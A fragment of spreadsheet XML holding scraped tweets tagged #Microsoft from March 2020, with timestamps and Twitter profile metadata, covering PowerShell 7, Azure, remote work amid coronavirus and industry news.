'https://pbs.twimg.com/profile_banners/840358637218516993/1529325160',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</si>
  <si>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#art #pixelart #fanart #ori #indie #microsoft #willofwisps
Hey, it's Ori and Sein from Ori &amp;amp; The Blind Forest! (sequel soon to be released)
I'm so hyped for Will of Wisps even if I won't be able to run it on my laptop, and an XboxOne is too expensive
Look below for comparison: https://t.co/3KTHji7uS3</t>
  </si>
  <si>
    <t>Thu Mar 05 21:38:36 +0000 2020</t>
  </si>
  <si>
    <t>#PowerShell 7 Now Commercially Released https://t.co/693L4SjWsW #Microsoft</t>
  </si>
  <si>
    <t>{'id': 30311616, 'id_str': '30311616', 'name': 'Redmond', 'screen_name': 'RedmondIT', 'location': 'In Print and Online', 'description': 'Redmond magazine: The independent voice of the Microsoft IT community. Delivering news, analysis and best practices for IT executives and network professionals.', 'url': 'http://t.co/TgptuU6DNa', 'entities': {'url': {'urls': [{'url': 'http://t.co/TgptuU6DNa', 'expanded_url': 'http://redmondmag.com', 'display_url': 'redmondmag.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4835, 'friends_count': 462, 'listed_count': 353, 'created_at': 'Fri Apr 10 20:59:39 +0000 2009', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7927, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '333333', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1083082794023055360/rj3okRVx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1083082794023055360/rj3okRVx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/30311616/1547062137', 'profile_link_color': '336699', 'profile_sidebar_border_color': '990000', 'profile_sidebar_fill_color': 'CCCCCC', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:35:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announces the availability of #PowerShell 7, the cross-platform automation tool and configuration framework, for #Windows, #macOS and #Linux https://t.co/0s1CImtAbb</t>
  </si>
  <si>
    <t>Thu Mar 05 21:35:17 +0000 2020</t>
  </si>
  <si>
    <t>Using #microsoft #teams makes sense for us. Using meetings seems relevant. #coronalearn #virtuallearning</t>
  </si>
  <si>
    <t>{'id': 17551873, 'id_str': '17551873', 'name': 'emflip', 'screen_name': 'emflip', 'location': 'Melbourne, Australia', 'description': 'Mum | Secondary teacher | D.Ed student @unimelb | clarinetist | scuba diver | skier |psychology | westie enthusiast.  tweets are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 251, 'friends_count': 397, 'listed_count': 17, 'created_at': 'Sat Nov 22 03:16:44 +0000 2008', 'favourites_count': 83, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1718,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'http://pbs.twimg.com/profile_images/1016470654101553152/9Rb2mQ2s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1016470654101553152/9Rb2mQ2s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17551873/1531180465', 'profile_link_color': '244D5B', 'profile_sidebar_border_color': '6CB2A0', 'profile_sidebar_fill_color': 'E45EA4', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:31:43 +0000 2020</t>
  </si>
  <si>
    <t>To all my tech friends (looking at you, #Microsoft peeps) who are joining the #remoteworking movement, a few tips:
- Always put on real clothes.
- Invest in a good mic and camera.
- Watch the snacking. WFH weight gain is real.
- Exercise. Stand up and stretch every so often.</t>
  </si>
  <si>
    <t>{'id': 389084537, 'id_str': '389084537', 'name': 'Ben Mann', 'screen_name': 'bhmann', 'location': '', 'description': 'Development Technologist. Policy Wonk. Engineering Nerd. Data Strategist. #PowerBI Champion. Working on measuring #DevelopmentResults @DAIGlobal.', 'url': 'https://t.co/ZlXcmT7pz4', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZlXcmT7pz4', 'expanded_url': 'https://medium.com/@bhmann', 'display_url': 'medium.com/@bhmann', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1096, 'friends_count': 1096, 'listed_count': 48, 'created_at': 'Tue Oct 11 20:44:03 +0000 2011', 'favourites_count': 419, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2034,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'http://pbs.twimg.com/profile_images/1047232960754307072/eJH6Hdno_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1047232960754307072/eJH6Hdno_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/389084537/1398864237', 'profile_link_color': '071152', 'profile_sidebar_border_color': '2C0436', 'profile_sidebar_fill_color': 'F5AA39', 'profile_text_color': '041747', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:30:19 +0000 2020</t>
  </si>
  <si>
    <t>#AWS to double sales droids as #Google, #Microsoft's growing clouds threaten to gobble larger slices of #Bezos' pie  The Register https://t.co/3tsarD8fxT</t>
  </si>
  <si>
    <t>{'id': 742326012, 'id_str': '742326012', 'name': 'Enno Dreier', 'screen_name': 'EnnoDreier', 'location': 'Trondheim, Norway', 'description': 'utilities, energy, cloud-native IT, cybersecurity.\nbringing @greenbirdIT to the world!\n\nviewpoints=my own.', 'url': 'https://t.co/0QTCEZcX1a', 'entities': {'url': {'urls': [{'url': 'https://t.co/0QTCEZcX1a', 'expanded_url': 'https://www.greenbird.com', 'display_url': 'greenbird.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 385, 'friends_count': 971, 'listed_count': 5, 'created_at': 'Tue Aug 07 06:45:49 +0000 2012', 'favourites_count': 1047, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1811,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'http://pbs.twimg.com/profile_images/1194983281105817600/Kiokp3Kx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194983281105817600/Kiokp3Kx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/742326012/1578716089',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</si>
  <si>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21:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat..... #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB520hNJ</t>
  </si>
  <si>
    <t>Thu Mar 05 21:28:31 +0000 2020</t>
  </si>
  <si>
    <t>Do you want to learn how to turbo charge your organisations #operations AND train flexibly around your other commitments? Sign up to our #MB-200: #Microsoft #PowerPlatform and #Dynamics #365 Customer Engagement Core course - blend of self-study and tutor led learning. https://t.co/h8G3k9v2Cr</t>
  </si>
  <si>
    <t>{'id': 1227008133123330048, 'id_str': '1227008133123330048', 'name': 'ACE Training', 'screen_name': 'ACETraining9', 'location': '', 'description': 'Unlocking Kiwi potential since 1987', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Mon Feb 10 23:15:32 +0000 2020', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227060863527342080/DqJpjk_j_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227060863527342080/DqJpjk_j_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227008133123330048/1583270415',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</si>
  <si>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21:27:56 +0000 2020</t>
  </si>
  <si>
    <t>The systems unites Property Management System (PMS) with deep retail, F&amp;amp;B and activity management functionality for properties of different sizes.
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #LinkedInTT</t>
  </si>
  <si>
    <t>{'id': 3956681915, 'id_str': '3956681915', 'name': 'Optimus Guru', 'screen_name': 'OptimusGuruBT', 'location': 'Doral, FL', 'description': 'We are an international business transformation services firm.  We help our clients optimize their business processes.', 'url': 'http://t.co/sJMm3aXloH', 'entities': {'url': {'urls': [{'url': 'http://t.co/sJMm3aXloH', 'expanded_url': 'http://www.optimus.guru', 'display_url': 'optimus.guru', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 478, 'friends_count': 286, 'listed_count': 20, 'created_at': 'Wed Oct 14 14:47:29 +0000 2015', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1505,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'http://pbs.twimg.com/profile_images/761250956063412224/tW-u-azZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/761250956063412224/tW-u-azZ_normal.jpg',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</si>
  <si>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21:27:52 +0000 2020</t>
  </si>
  <si>
    <t>Update to the Microsoft Authenticator app now rolling out.
#mfa #security #microsoft https://t.co/FhPuKLE71y</t>
  </si>
  <si>
    <t>{'id': 951204374, 'id_str': '951204374', 'name': 'Rene Vlieger', 'screen_name': 'RVlieger', 'location': 'Nederland', 'description': 'Tech junk, Office365, user adoption, teams, mma, football, Ajax, good red wine, Classic music, cycling, running and my family.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 869, 'listed_count': 9, 'created_at': 'Fri Nov 16 07:39:17 +0000 2012', 'favourites_count': 297, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3383,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'http://pbs.twimg.com/profile_images/1026203074380132352/SY4qKVxk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026203074380132352/SY4qKVxk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/951204374/1565680069',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</si>
  <si>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21:23:19 +0000 2020</t>
  </si>
  <si>
    <t>Reply becomes a #microsoft #azure expert managed service provider. More power to the cloud!
Cluster Reply UK Solidsoft Reply WM Reply 
#Cloud #MSP 
#sub360i https://t.co/MSW4ZOZW0E</t>
  </si>
  <si>
    <t>{'id': 173883100, 'id_str': '173883100', 'name': 'Jason Hill', 'screen_name': 'Mr_Jason_Hill', 'location': 'Surrey', 'description': 'ðŸ‡¬ðŸ‡§ðŸ”¶ Husband &amp; dad of 2. Long suffering Sheffield Wednesday fan. #Sub360i', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 275, 'friends_count': 178, 'listed_count': 14, 'created_at': 'Mon Aug 02 16:06:19 +0000 2010', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2026,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'http://pbs.twimg.com/profile_images/1359669204/image_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1359669204/image_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/173883100/1570105340',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</si>
  <si>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21:22:28 +0000 2020</t>
  </si>
  <si>
    <t>[Watch on-demand] Meet the New Yammer Webinar, March 2020 https://t.co/66wk0NksGf #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 21:20:41 +0000 2020</t>
  </si>
  <si>
    <t>3 hours later...a message from #Microsoft https://t.co/AFvFpZXhZZ</t>
  </si>
  <si>
    <t>{'id': 3226248627, 'id_str': '3226248627', 'name': "Don O'Connor", 'screen_name': 'DonnyoSpeaks', 'location': 'Ottawa', 'description': 'Retail and Hospitality Stories That Solve Problems \nhttps://t.co/mzAAGo0hWR', 'url': 'https://t.co/wxryJpLz6o', 'entities': {'url': {'urls': [{'url': 'https://t.co/wxryJpLz6o', 'expanded_url': 'https://ca.linkedin.com/in/donaldoconnor', 'display_url': 'ca.linkedin.com/in/donaldoconnâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/mzAAGo0hWR', 'expanded_url': 'http://donaldoconnorspeak.wixsite.com/speaker', 'display_url': 'donaldoconnorspeak.wixsite.com/speaker', 'indices': [52, 75]}]}}, 'protected': False, 'followers_count': 1182, 'friends_count': 1992, 'listed_count': 299, 'created_at': 'Fri May 01 14:21:20 +0000 2015', 'favourites_count': 56831, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 42304,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'http://pbs.twimg.com/profile_images/1195665131088289792/qbVF2fEA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195665131088289792/qbVF2fEA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3226248627/1575639573',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</si>
  <si>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21:20:38 +0000 2020</t>
  </si>
  <si>
    <t>@csharpfritz @code Do you have by any chance the extension link or name to give it a try? It's unbelievable how @code doesn't provide a good experience for #Microsoft own technologies?</t>
  </si>
  <si>
    <t>{'id': 6414712, 'id_str': '6414712', 'name': 'Asdrubal Chirinos', 'screen_name': 'achirinos', 'location': 'Ciudad de MÃ©xico, MÃ©xico', 'description': 'Venezolano en MÃ©xico, Desarrollador Web y MÃ³vil, Influenciador Microsoft usando Ubuntu Linux, Hijo del Rock, F1 lover, fotÃ³grafo wannabe, poeta, loco y ateo.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 651, 'friends_count': 456, 'listed_count': 77, 'created_at': 'Tue May 29 13:25:49 +0000 2007', 'favourites_count': 6756, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20888, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCECD3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1154012137502756864/mxiNzCKq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154012137502756864/mxiNzCKq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6414712/1564167166', 'profile_link_color': '699938', 'profile_sidebar_border_color': '5ED4DC', 'profile_sidebar_fill_color': 'E7FDFE', 'profile_text_color': '3C3940', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:20:24 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery mobility service automated deployment using JetPatch
- https://t.co/svvqony8cE
#Azure #Microsoft #Cloud #DisasterRecovery #VMware https://t.co/IyWb1hFCJJ</t>
  </si>
  <si>
    <t>Thu Mar 05 21:17:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Linux Conference #WSLConf is SOLD OUT for General Admission
 #Microsoft #Azure #MicrosoftAzure
https://t.co/gwWEKA9ZWt</t>
  </si>
  <si>
    <t>Thu Mar 05 21:16:13 +0000 2020</t>
  </si>
  <si>
    <t>Amazon, Google, Facebook, and Microsoft are asking Seattle-based staff to work from home because of coronavirus https://t.co/KYaAxjJC66 #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 21:15:38 +0000 2020</t>
  </si>
  <si>
    <t>Automatic instance repairs for Azure virtual machine scale sets now in preview
- automatically repair unhealthy instances based on application health status
https://t.co/G8fJBasjVy
#Azure #Microsoft #Cloud #Compute #ScaleSets #Repair https://t.co/6alnMOjJOn</t>
  </si>
  <si>
    <t>Thu Mar 05 21:15:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Defender ATP for #Linux is coming! ...And a sneak peek into whats next
https://t.co/p9ixCRMTa9</t>
  </si>
  <si>
    <t>{'id': 19174341, 'id_str': '19174341', 'name': 'X-Centric', 'screen_name': 'x_centric', 'location': 'Milwaukee, WI', 'description': 'Our mission is to help you meet and exceed your business and technology goals and achieve a consistent return on your IT investments.', 'url': 'http://t.co/7F9Uk3WgzD', 'entities': {'url': {'urls': [{'url': 'http://t.co/7F9Uk3WgzD', 'expanded_url': 'http://www.x-centric.com', 'display_url': 'x-centric.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 64, 'friends_count': 55, 'listed_count': 5, 'created_at': 'Mon Jan 19 06:01:56 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 489, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C6E2EE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/960988826532327424/fkoB7nTa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/960988826532327424/fkoB7nTa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19174341/1562909489',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</si>
  <si>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21:13:49 +0000 2020</t>
  </si>
  <si>
    <t>#Hackers push malware to hijacked #Microsoft sub-domains
https://t.co/xhUwokVEsc</t>
  </si>
  <si>
    <t>{'id': 911268489171750915, 'id_str': '911268489171750915', 'name': 'Ronnie Watson ðŸ’¼', 'screen_name': 'Secopsgeek', 'location': 'Cyber Space', 'description': 'Cyber Enthusiast | Sec+| #ITSecurity #TogetherWeHitHarder https://t.co/vZ5P0FPzV0', 'url': 'https://t.co/8zLCXl9MWV', 'entities': {'url': {'urls': [{'url': 'https://t.co/8zLCXl9MWV', 'expanded_url': 'https://watsoninfosec.com', 'display_url': 'watsoninfosec.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/vZ5P0FPzV0', 'expanded_url': 'https://keybase.io/ronniewatson', 'display_url': 'keybase.io/ronniewatson', 'indices': [58, 81]}]}}, 'protected': False, 'followers_count': 758, 'friends_count': 511, 'listed_count': 13, 'created_at': 'Fri Sep 22 16:38:33 +0000 2017', 'favourites_count': 4147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5693, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1216349410537484289/tv5JcWJf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216349410537484289/tv5JcWJf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/911268489171750915/1571819903',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</si>
  <si>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21:11:25 +0000 2020</t>
  </si>
  <si>
    <t>Who's winning in the multicloud world? Actually, it's still a wide-open race | Interesting summary from @SiliconANGLE and how major players stack. #MultiCloud #NetApp #Microsoft #AWS #GCP #VMware #Cisco https://t.co/KjkqX4GCbc</t>
  </si>
  <si>
    <t>{'id': 897693815422803968, 'id_str': '897693815422803968', 'name': 'DeeVee Devarakonda', 'screen_name': 'DV_Devarakonda', 'location': '', 'description': 'Alliances I AI &amp; DL I Data I Cloud I Healthcare I Climate Change Solutions I #WIT I #WomenInSTEM I Books I Movies- A few of my favorite things !!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Wed Aug 16 05:37:38 +0000 2017', 'favourites_count': 755, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 206, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1089704360173600768/XoRuMIX__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1089704360173600768/XoRuMIX__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/897693815422803968/1575697660',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</si>
  <si>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21:11:01 +0000 2020</t>
  </si>
  <si>
    <t>#BigData picture on #Microsoft #Azure widens with new Redmond-backed #Hadoop distribution. @chriskanaracus https://t.co/MaYE8g4udm</t>
  </si>
  <si>
    <t>{'id': 40899595, 'id_str': '40899595', 'name': 'SearchCloudComputing', 'screen_name': 'TTintheCloud', 'location': 'Newton, MA', 'description': 'SearchCloudComputing is TechTargetâ€™s #cloudcomputing resource, with coverage of public, private, hybrid and multi-cloud deployments.', 'url': 'https://t.co/AeDwBEXhPk', 'entities': {'url': {'urls': [{'url': 'https://t.co/AeDwBEXhPk', 'expanded_url': 'https://searchcloudcomputing.techtarget.com', 'display_url': 'searchcloudcomputing.techtarget.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11153, 'friends_count': 6726, 'listed_count': 735, 'created_at': 'Mon May 18 15:48:58 +0000 2009', 'favourites_count': 5050, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15399, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CCCCCC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/941367679461609473/pncM81gf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/941367679461609473/pncM81gf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40899595/1513274539', 'profile_link_color': '00B3AD',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</si>
  <si>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21:10:54 +0000 2020</t>
  </si>
  <si>
    <t>Final Q4 numbers are in and 2019 enterprise spending on #SaaS topped $101B worldwide, up 26% from 2018. Highest growth segments were Collaboration &amp;amp; HR/HCM; overall market leader was #Microsoft, followed by Salesforce, Adobe, SAP &amp;amp; Oracle.
https://t.co/D74Wn9lIxI https://t.co/uS4jTaixfh</t>
  </si>
  <si>
    <t>{'id': 425219352, 'id_str': '425219352', 'name': 'Synergy', 'screen_name': 'SRG_Research', 'location': '', 'description': 'Synergy Research Group is a leading and trusted source of detailed market research for the networking and telecom industries.', 'url': 'http://t.co/TrSUfjiWMo', 'entities': {'url': {'urls': [{'url': 'http://t.co/TrSUfjiWMo', 'expanded_url': 'http://www.srgresearch.com', 'display_url': 'srgresearch.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 582, 'friends_count': 716, 'listed_count': 22, 'created_at': 'Wed Nov 30 18:30:51 +0000 2011', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 114,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'http://pbs.twimg.com/profile_images/1666686765/Twitter_Logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1666686765/Twitter_Logo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/425219352/1415296072', 'profile_link_color': '4EBA80',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</si>
  <si>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21:09:50 +0000 2020</t>
  </si>
  <si>
    <t>Spank my tits it's the only way I learn ! #Iowa   #atl #microsoft https://t.co/SbwOyxGxCa</t>
  </si>
  <si>
    <t>{'id': 1235662627164090374, 'id_str': '1235662627164090374', 'name': 'Liza Deal', 'screen_name': 'knowikanit', 'location': 'Provo, USA', 'description': 'Chemistry is you touching my arm and setting fire to my mind.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Thu Mar 05 20:25:08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'http://pbs.twimg.com/profile_images/1235670673302917120/Hp8oFUmp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235670673302917120/Hp8oFUmp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235662627164090374/1583441856',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</si>
  <si>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21:09:17 +0000 2020</t>
  </si>
  <si>
    <t>@IMCloud_UK Dynamics 365 Marketing 2020 Release Wave 1 video now live. Here is PART 2!!
Give it a watch, let me know if you have questions. I love D365 Marketing &amp;amp; these enhancements are awesome!! 
#Dynamics365 #Microsoft #MSDyn365 #IngramMicroCloud #D365
https://t.co/D0jk8vrunD</t>
  </si>
  <si>
    <t>{'id': 1230856853715812353, 'id_str': '1230856853715812353', 'name': 'Mat D365 Batterbee - #TechGeekThatLifts', 'screen_name': 'D365Mat', 'location': 'Chester, England', 'description': 'Ingram Micro Cloud UK Dynamics 365 Lead        \n https://t.co/RO4bfxjPCB', 'url': 'https://t.co/mJKHGZZz4f', 'entities': {'url': {'urls': [{'url': 'https://t.co/mJKHGZZz4f', 'expanded_url': 'https://microsoft.ingrammicrocloud.com/dynamics', 'display_url': 'microsoft.ingrammicrocloud.com/dynamics', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/RO4bfxjPCB', 'expanded_url': 'https://www.linkedin.com/mwlite/in/mathew-batterbee-7580a8ba', 'display_url': 'linkedin.com/mwlite/in/mathâ€¦', 'indices': [49, 72]}]}}, 'protected': False, 'followers_count': 120, 'friends_count': 1224, 'listed_count': 0, 'created_at': 'Fri Feb 21 14:08:45 +0000 2020', 'favourites_count': 880, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 55, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231268123120144384/lL9AT39A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231268123120144384/lL9AT39A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230856853715812353/1582303153',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</si>
  <si>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21:08:40 +0000 2020</t>
  </si>
  <si>
    <t>Today, @Microsoft joins us in saying that more most be done to close the digital divide and bring Internet to all Americans. We are excited about the potential of Microsoft Airband! 
#microsoft #broadbandnow #internet #digitaldivide
https://t.co/Q9YfKbkwNH</t>
  </si>
  <si>
    <t>{'id': 2293370286, 'id_str': '2293370286', 'name': 'BroadbandNow', 'screen_name': 'Broadband_Now', 'location': '', 'description': 'We believe broadband Internet should be available to all Americans. This is what weâ€™re doing to make that a reality.\n#broadbandnow\nâ €\nRT &amp; Follow â‰  Endorsement', 'url': 'https://t.co/H63z1C3HoN', 'entities': {'url': {'urls': [{'url': 'https://t.co/H63z1C3HoN', 'expanded_url': 'http://www.broadbandnow.com', 'display_url': 'broadbandnow.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 177, 'friends_count': 100, 'listed_count': 4, 'created_at': 'Wed Jan 15 20:43:16 +0000 2014', 'favourites_count': 166, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1169401029953126400/DP90X286_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169401029953126400/DP90X286_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2293370286/1567716073',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</si>
  <si>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21:08:10 +0000 2020</t>
  </si>
  <si>
    <t>@IMCloud_UK Dynamics 365 Marketing 2020 Release Wave 1 video now live. Here is PART 1!!
Give it a watch, let me know if you have questions. I love D365 Marketing &amp;amp; these enhancements are awesome!! 
#Dynamics365 #Microsoft #MSDyn365 #IngramMicroCloud
https://t.co/9Ocjh3X8cH</t>
  </si>
  <si>
    <t>Thu Mar 05 21:05:56 +0000 2020</t>
  </si>
  <si>
    <t>free sources and I am not greedy and groups like #Microsoft Slaves and #Apple ....</t>
  </si>
  <si>
    <t>{'id': 879004347002212352, 'id_str': '879004347002212352', 'name': 'GHRISSI', 'screen_name': 'Ghrissiha', 'location': 'In some places', 'description': '#blogging. #Mechanics, #cars and #motorcycles. #Camping.#music. #Cinema.  #tourism.', 'url': 'https://t.co/aTSGPk2sAb', 'entities': {'url': {'urls': [{'url': 'https://t.co/aTSGPk2sAb', 'expanded_url': 'https://ghrissi.blogspot.com/', 'display_url': 'ghrissi.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 505, 'friends_count': 3170, 'listed_count': 1, 'created_at': 'Sun Jun 25 15:52:22 +0000 2017', 'favourites_count': 2129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2449,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'http://pbs.twimg.com/profile_images/1230847598954676224/QBuq2Bi6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230847598954676224/QBuq2Bi6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/879004347002212352/1568836536', 'profile_link_color': '868A08',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</si>
  <si>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21:05:25 +0000 2020</t>
  </si>
  <si>
